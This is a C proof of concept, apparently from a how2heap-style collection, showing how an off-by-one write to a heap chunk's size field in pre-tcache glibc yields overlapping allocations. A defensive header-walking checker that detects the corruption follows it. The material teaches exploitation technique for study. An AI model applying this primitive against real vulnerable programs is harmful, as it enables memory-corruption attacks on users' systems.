/* Similar to overlapping_chunks.c (from how2heap) with a small change.
 * Instead of overwriting the size of an unsorted chunk, overwrite the size of a small chunk.
 * Now you have to malloc the original size to retrieve this chunk.
 * Freeing it again will create an overlapping chunk in the unsorted bin, which
 * can later be retrieved using malloc(corrupt_size).
 *
 * Written against a glibc without tcache (the comments below describe the
 * unsorted-bin / smallbin behaviour of glibc 2.25 and earlier); on a tcache-enabled
 * glibc the bin movements described here are different.
 */
#include <stdio.h>
#include <stdlib.h>

int main() {
    char *p1 = malloc(0x108);
    char *p2 = malloc(0x108);
    char *p3 = malloc(0x0);   // Preventing merge with top chunk

    free(p2);                 // Unsorted bin
    char *p4 = malloc(0x200); // p2 goes to smallbin (0x200 request is served from top)

    // Off by one vuln: p1's usable region is 0x108 bytes, so index 0x108
    // is the low byte of p2's size field
    p1[0x108] = 0x51;
    // p2's size field is now 0x151 (size 0x150 | PREV_INUSE), but p2 still sits
    // in the 0x110 smallbin. Hence, it will be returned by malloc(0x108).
    //
    // NOTE: A chunk of size 0x150 is returned for a requested size
    // of 0x108
    char *p5 = malloc(0x108);

    // The chunk "after" p5 now lies at p5 + 0x150, i.e. at p4 + 0x10.
    // Setting some valid size for that next chunk
    p4[0x10 + 0x8] = 0x21;
    // Setting the next chunk's next chunk to be in use (PREV_INUSE bit),
    // so free(p5) does not try to consolidate forward
    p4[0x10 + 0x20 + 0x8] = 0x1;

    free(p5);                 // p2 freed again
    // Now we have a free chunk of size 0x150 in the unsorted bin
    // which is overlapping with p3!!
    char *p6 = malloc(0x140);
    fprintf(stderr, "Overlap p6: %p - %p, p3: %p\n", p6, p6 + 0x140, p3);
    return 0;
}
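The paste shows why this works: the off-by-one rewrites a neighbour's size field, so chunk headers no longer chain cleanly through the heap. The following is an added example, not part of the paste or of how2heap, that mirrors the paste's chunk layout (p1 0x110, p2 0x110, p3 0x20, p4 0x210, then top) in a constructed buffer and walks the headers the way a heap-consistency checker would: sizes must be aligned, at least MIN_CHUNK, and tile the region exactly. The walk is clean on the intact layout and reports the first inconsistent header after the p1[0x108] write, and again after the two fake headers are planted. Offsets, HEAP_LEN and the function names are this example's own assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PREV_INUSE 0x1UL
#define SIZE_BITS  0x7UL   /* PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA */
#define MIN_CHUNK  0x20UL
#define HEAP_LEN   0x1000UL

static uint64_t rd(const uint8_t *p) { uint64_t v; memcpy(&v, p, 8); return v; }
static void     wr(uint8_t *p, uint64_t v) { memcpy(p, &v, 8); }

/* Walk chunk headers from the start of the region. Return the offset of the
 * first header whose size is too small, unaligned, or runs past the region,
 * or -1 if the sizes chain exactly to the end (the invariant a valid heap keeps). */
long first_bad_chunk(const uint8_t *heap, size_t len) {
    size_t off = 0;
    while (off < len) {
        if (len - off < 16) return (long)off;
        uint64_t size = rd(heap + off + 8) & ~SIZE_BITS;
        if (size < MIN_CHUNK || (size & 0xf) || size > len - off) return (long)off;
        off += size;
    }
    return -1;
}

/* Constructed layout mirroring the paste: p1 0x110, p2 0x110, p3 0x20, p4 0x210,
 * then the top chunk. Offsets are from the start of the simulated heap. */
void build_layout(uint8_t *heap) {
    memset(heap, 0, HEAP_LEN);
    wr(heap + 0x000 + 8, 0x110 | PREV_INUSE);   /* p1, user data at 0x010 */
    wr(heap + 0x110 + 8, 0x110 | PREV_INUSE);   /* p2 */
    wr(heap + 0x220 + 8, 0x020 | PREV_INUSE);   /* p3 */
    wr(heap + 0x240 + 8, 0x210 | PREV_INUSE);   /* p4, user data at 0x250 */
    wr(heap + 0x450 + 8, (HEAP_LEN - 0x450) | PREV_INUSE); /* top */
}

/* stage 0: intact; 1: after the paste's p1[0x108] = 0x51; 2: after its two fake headers too */
long check_stage(int stage) {
    uint8_t heap[HEAP_LEN];
    build_layout(heap);
    if (stage >= 1) heap[0x010 + 0x108] = 0x51;          /* low byte of p2's size -> 0x151 */
    if (stage >= 2) { heap[0x250 + 0x18] = 0x21; heap[0x250 + 0x38] = 0x01; }
    return first_bad_chunk(heap, HEAP_LEN);
}

int main(void) {
    for (int s = 0; s < 3; s++)
        printf("stage %d: first inconsistent header at offset %ld\n", s, check_stage(s));
    return 0;
}
```

Stage 1 fails at 0x260 (the corrupted 0x150 size lands inside p4's user data, where the "next" header is zero) and stage 2 at 0x280 (the planted 0x1 decodes to size 0), so the fake headers that satisfy free()'s local checks still do not tile the heap.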